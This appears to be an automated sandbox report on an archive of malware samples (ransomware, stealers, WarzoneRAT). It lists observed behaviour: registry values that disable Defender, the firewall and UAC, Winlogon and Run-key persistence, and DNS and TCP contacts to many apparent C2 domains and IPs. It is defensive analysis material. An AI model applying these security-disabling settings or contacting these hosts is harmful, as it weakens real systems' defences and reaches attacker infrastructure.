Malware Analysis Report

2025-01-18 20:48

Sample ID 241122-dyw1qszkhp
Target Batch_7.zip
SHA256 17b4d01d32c64a62e36496829da323fe308437048ca87143de7365fabd4194fd
Tags
discovery evasion persistence trojan upx defense_evasion ransomware spyware stealer xorist pony collection credential_access execution rat impact warzonerat infostealer crypvault
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

17b4d01d32c64a62e36496829da323fe308437048ca87143de7365fabd4194fd

Threat Level: Known bad

The file Batch_7.zip was found to be: Known bad.

Malicious Activity Summary

discovery evasion persistence trojan upx defense_evasion ransomware spyware stealer xorist pony collection credential_access execution rat impact warzonerat infostealer crypvault

WarzoneRat, AveMaria

CrypVault

Pony,Fareit

Detected Xorist Ransomware

Modifies security service

Process spawned unexpected child process

Windows security bypass

Crypvault family

Pony family

Xorist family

Modifies firewall policy service

Xorist Ransomware

Modifies WinLogon for persistence

UAC bypass

Warzonerat family

Renames multiple (4027) files with added filename extension

Deletes shadow copies

Renames multiple (2558) files with added filename extension

Warzone RAT payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Modifies boot configuration data using bcdedit

Drops file in Drivers directory

Disables Task Manager via registry modification

Disables RegEdit via registry modification

Blocklisted process makes network request

Windows security modification

Checks computer location settings

Unsecured Credentials: Credentials In Files

Deletes itself

Drops startup file

Executes dropped EXE

Loads dropped DLL

Reads user/profile data of web browsers

Reads data files stored by FTP clients

Looks up external IP address via web service

Accesses Microsoft Outlook profiles

Indicator Removal: File Deletion

Accesses Microsoft Outlook accounts

Accesses cryptocurrency files/wallets, possible credential harvesting

Blocklisted process makes network request

Checks installed software on the system

Enumerates connected drives

Requests dangerous framework permissions

Checks whether UAC is enabled

Adds Run key to start application

UPX packed file

Suspicious use of SetThreadContext

Enumerates processes with tasklist

Sets desktop wallpaper using registry

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Program crash

Command and Scripting Interpreter: JavaScript

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Reads user/profile data of web browsers

Unsigned PE

Opens file in notepad (likely ransom note)

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Uses Volume Shadow Copy service COM API

Suspicious use of FindShellTrayWindow

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: CmdExeWriteProcessMemorySpam

Interacts with shadow copies

Suspicious use of SendNotifyMessage

Views/modifies file attributes

System policy modification

Modifies data under HKEY_USERS

Modifies Internet Explorer settings

outlook_win_path

Suspicious behavior: RenamesItself

Suspicious use of UnmapMainImage

Kills process with taskkill

Modifies Internet Explorer Phishing Filter

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-11-22 03:25

Signatures

Requests dangerous framework permissions

Description Indicator Process Target
Allows read only access to phone state, including the current cellular network information, the status of any ongoing calls, and a list of any PhoneAccounts registered on the device. android.permission.READ_PHONE_STATE N/A N/A
Allows access to the list of accounts in the Accounts Service. android.permission.GET_ACCOUNTS N/A N/A
Allows an application to write to external storage. android.permission.WRITE_EXTERNAL_STORAGE N/A N/A
Allows an application to read from external storage. android.permission.READ_EXTERNAL_STORAGE N/A N/A
Allows an app to create windows using the type LayoutParams.TYPE_APPLICATION_OVERLAY, shown on top of all other apps. android.permission.SYSTEM_ALERT_WINDOW N/A N/A
Required to be able to access the camera device. android.permission.CAMERA N/A N/A
Allows an application to read the user's contacts data. android.permission.READ_CONTACTS N/A N/A
Allows an application to read or write the system settings. android.permission.WRITE_SETTINGS N/A N/A
Allows an application to read the user's contacts data. android.permission.READ_CONTACTS N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:09

Platform

win7-20240903-en

Max time kernel

570s

Max time network

362s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Dumped_.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Dumped_.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Dumped_.exe

"C:\Users\Admin\AppData\Local\Temp\Dumped_.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 dolores.cursopersona.com udp

Files

memory/3028-0-0x0000000000AC0000-0x0000000000AD2000-memory.dmp

memory/3028-4-0x0000000000AC0000-0x0000000000AD2000-memory.dmp

C:\ProgramData\hgybrtlyzvfoikl

MD5 241ce528d53d871b6d1acc37205c2eae
SHA1 095f4255e244bdc9289483e901c4ecd3f348f1be
SHA256 dbdd37ac8cf3d6eac875133b03690ca4fe030248a4732d3e95dac906fd42e29c
SHA512 6ec601a12efe4ea214d8413f5e4c64b33e2d7f27acdb596303391a3f5ca6d468576e9c6400fe852601c7612e26f205443b7e9d277d69517e1ed668ec8d738f0a

Analysis: behavioral10

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:10

Platform

win7-20241023-en

Max time kernel

600s

Max time network

581s

Command Line

"C:\Users\Admin\AppData\Local\Temp\dircrypt.deobf.exe"

Signatures

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "userinit.exe,,C:\\Program Files (x86)\\Mozilla Maintenance Service\\BMNNWfaO.exe" C:\Users\Admin\AppData\Local\Temp\dircrypt.deobf.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,,C:\\Program Files (x86)\\Mozilla Maintenance Service\\BMNNWfaO.exe" C:\Users\Admin\AppData\Local\Temp\dircrypt.deobf.exe N/A

Modifies firewall policy service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = "1" C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0" C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start = "4" C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start = "4" C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Start = "4" C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UacDisableNotify = "1" C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A

Disables Task Manager via registry modification

evasion

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LNHcdsKW.exe C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LNHcdsKW.exe C:\Users\Admin\AppData\Local\Temp\dircrypt.deobf.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LNHcdsKW.exe C:\Users\Admin\AppData\Local\Temp\dircrypt.deobf.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LNHcdsKW.exe C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Dirty\DirtyDecrypt.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UacDisableNotify = "1" C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\TUEiLXib = "C:\\Users\\Admin\\AppData\\Local\\Google\\HIvlukUD.exe" C:\Users\Admin\AppData\Local\Temp\dircrypt.deobf.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\TUEiLXib = "C:\\Users\\Admin\\AppData\\Local\\Google\\HIvlukUD.exe" C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\DirtyDecrypt = "\"C:\\Users\\Admin\\AppData\\Roaming\\Dirty\\DirtyDecrypt.exe\" /hide" C:\Users\Admin\AppData\Roaming\Dirty\DirtyDecrypt.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Mozilla Maintenance Service\BMNNWfaO.exe C:\Users\Admin\AppData\Local\Temp\dircrypt.deobf.exe N/A
File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\BMNNWfaO.exe C:\Users\Admin\AppData\Local\Temp\dircrypt.deobf.exe N/A
File created C:\Program Files (x86)\Dirty\DirtyDecrypt.exe C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
File opened for modification C:\Program Files (x86)\Dirty\DirtyDecrypt.exe C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\dircrypt.deobf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Dirty\DirtyDecrypt.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\dircrypt.deobf.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\dircrypt.deobf.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\dircrypt.deobf.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\Dirty\DirtyDecrypt.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Dirty\DirtyDecrypt.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Roaming\Dirty\DirtyDecrypt.exe N/A

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\dircrypt.deobf.exe

"C:\Users\Admin\AppData\Local\Temp\dircrypt.deobf.exe"

C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe

"C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe"

C:\Users\Admin\AppData\Roaming\Dirty\DirtyDecrypt.exe

"C:\Users\Admin\AppData\Roaming\Dirty\DirtyDecrypt.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 viweabkkfe.com udp
DE 178.162.203.202:80 viweabkkfe.com tcp
DE 178.162.203.202:80 viweabkkfe.com tcp
US 8.8.8.8:53 lscyqrjofqmtn.com udp
US 8.8.8.8:53 ltcfpuctidqqqxxzpikz.com udp
US 8.8.8.8:53 linbzxpkmdtngnbdg.com udp
US 8.8.8.8:53 wowsfhnnvlwhlotryvh.com udp
US 8.8.8.8:53 sjytgtnkdl.com udp
US 8.8.8.8:53 ltcfpuctidqqqxxzpikz.com udp
US 8.8.8.8:53 lscyqrjofqmtn.com udp
US 8.8.8.8:53 linbzxpkmdtngnbdg.com udp
DE 169.50.13.61:80 sjytgtnkdl.com tcp
US 8.8.8.8:53 wowsfhnnvlwhlotryvh.com udp
US 8.8.8.8:53 zkkfpkbbfnmihohix.com udp
US 8.8.8.8:53 vjuxtixi.com udp
US 8.8.8.8:53 ntrshvquunyzxevkucs.com udp
US 8.8.8.8:53 lxpcmncky.com udp
US 8.8.8.8:53 zkkfpkbbfnmihohix.com udp
DE 169.50.13.61:80 ntrshvquunyzxevkucs.com tcp
DE 169.50.13.61:80 ntrshvquunyzxevkucs.com tcp
US 8.8.8.8:53 pjgnhujlmwtgf.com udp
US 8.8.8.8:53 pvqwziehrqscosb.com udp
US 8.8.8.8:53 pjgnhujlmwtgf.com udp
US 8.8.8.8:53 pvqwziehrqscosb.com udp
US 8.8.8.8:53 qxcrbliabignczlmuc.com udp
US 8.8.8.8:53 okenhqzgxngnkbwouvfm.com udp
US 8.8.8.8:53 bfgtwvhgsibiufmcerl.com udp
US 8.8.8.8:53 oismeark.com udp
US 8.8.8.8:53 qxcrbliabignczlmuc.com udp
DE 169.50.13.61:80 okenhqzgxngnkbwouvfm.com tcp
US 8.8.8.8:53 bfgtwvhgsibiufmcerl.com udp
US 8.8.8.8:53 wxluitpliymeoirc.com udp
US 8.8.8.8:53 mzwfwjayhom.com udp
DE 169.50.13.61:80 wxluitpliymeoirc.com tcp
US 8.8.8.8:53 kvmihtamuopvagdlrwzg.com udp
US 8.8.8.8:53 kvmihtamuopvagdlrwzg.com udp
US 8.8.8.8:53 rtlwqvhwuisfnery.com udp
US 8.8.8.8:53 xzfqmrfmyuaxs.com udp
US 8.8.8.8:53 rtlwqvhwuisfnery.com udp
US 8.8.8.8:53 xzfqmrfmyuaxs.com udp
US 8.8.8.8:53 xtvklujmo.com udp
US 8.8.8.8:53 dxkirxfzwhnnah.com udp
US 8.8.8.8:53 dxkirxfzwhnnah.com udp
US 8.8.8.8:53 vyeaukkyszhdeug.com udp
US 8.8.8.8:53 vyeaukkyszhdeug.com udp
US 8.8.8.8:53 kcubcfuhwwn.com udp
DE 169.50.13.61:80 kcubcfuhwwn.com tcp
US 8.8.8.8:53 cpejcogzznpudbsmaxxm.com udp
US 8.8.8.8:53 cpejcogzznpudbsmaxxm.com udp
US 8.8.8.8:53 zvwbjvhfrkqciz.com udp
US 8.8.8.8:53 zvwbjvhfrkqciz.com udp
US 8.8.8.8:53 pnqclaedmavju.com udp
US 8.8.8.8:53 pnqclaedmavju.com udp
US 8.8.8.8:53 kwsrmhroj.com udp
US 8.8.8.8:53 lxpcmncky.com udp
US 8.8.8.8:53 oismeark.com udp
US 8.8.8.8:53 mzwfwjayhom.com udp
US 8.8.8.8:53 xtvklujmo.com udp
US 8.8.8.8:53 kwsrmhroj.com udp
US 8.8.8.8:53 qwtzjokvjfvecysgypbd.com udp
US 8.8.8.8:53 qwtzjokvjfvecysgypbd.com udp
US 8.8.8.8:53 avcctrnrxx.com udp
US 8.8.8.8:53 vgcdinjoj.com udp
US 8.8.8.8:53 towhyechciopdte.com udp
US 8.8.8.8:53 towhyechciopdte.com udp
US 8.8.8.8:53 tmgskmvaxftffa.com udp
US 8.8.8.8:53 tmgskmvaxftffa.com udp
US 8.8.8.8:53 eiiveuuptweirgz.com udp
US 8.8.8.8:53 fryqhsblmvzsal.com udp
US 8.8.8.8:53 eiiveuuptweirgz.com udp
US 8.8.8.8:53 ohrpszrfydauhfuzyzbk.com udp
US 8.8.8.8:53 fryqhsblmvzsal.com udp
US 8.8.8.8:53 ohrpszrfydauhfuzyzbk.com udp
US 8.8.8.8:53 zbzxolintzi.com udp
US 8.8.8.8:53 fidkjesxq.com udp
US 8.8.8.8:53 owsxylebhmuzver.com udp
US 8.8.8.8:53 owsxylebhmuzver.com udp
US 8.8.8.8:53 izaubgigwfl.com udp
US 8.8.8.8:53 avcctrnrxx.com udp
US 8.8.8.8:53 vgcdinjoj.com udp
US 8.8.8.8:53 zbzxolintzi.com udp
US 8.8.8.8:53 fidkjesxq.com udp
US 8.8.8.8:53 izaubgigwfl.com udp
US 8.8.8.8:53 yievjaklo.com udp
US 8.8.8.8:53 hqihrutpabwndvldae.com udp
US 8.8.8.8:53 hqihrutpabwndvldae.com udp
US 8.8.8.8:53 nuepdkau.com udp
US 8.8.8.8:53 rjpkxiywinyhjoqltq.com udp
US 8.8.8.8:53 rjpkxiywinyhjoqltq.com udp
US 8.8.8.8:53 worazowxtkdznvvz.com udp
US 8.8.8.8:53 worazowxtkdznvvz.com udp
US 8.8.8.8:53 fzzxkhmkfunhotpjmdoy.com udp
US 8.8.8.8:53 fzzxkhmkfunhotpjmdoy.com udp
US 8.8.8.8:53 kuyfpapjundhcit.com udp
US 8.8.8.8:53 nxcyhbauwgvdryyz.com udp
US 8.8.8.8:53 ajfdmjbywzibf.com udp
US 8.8.8.8:53 kuyfpapjundhcit.com udp
US 8.8.8.8:53 nxcyhbauwgvdryyz.com udp
US 8.8.8.8:53 ajfdmjbywzibf.com udp
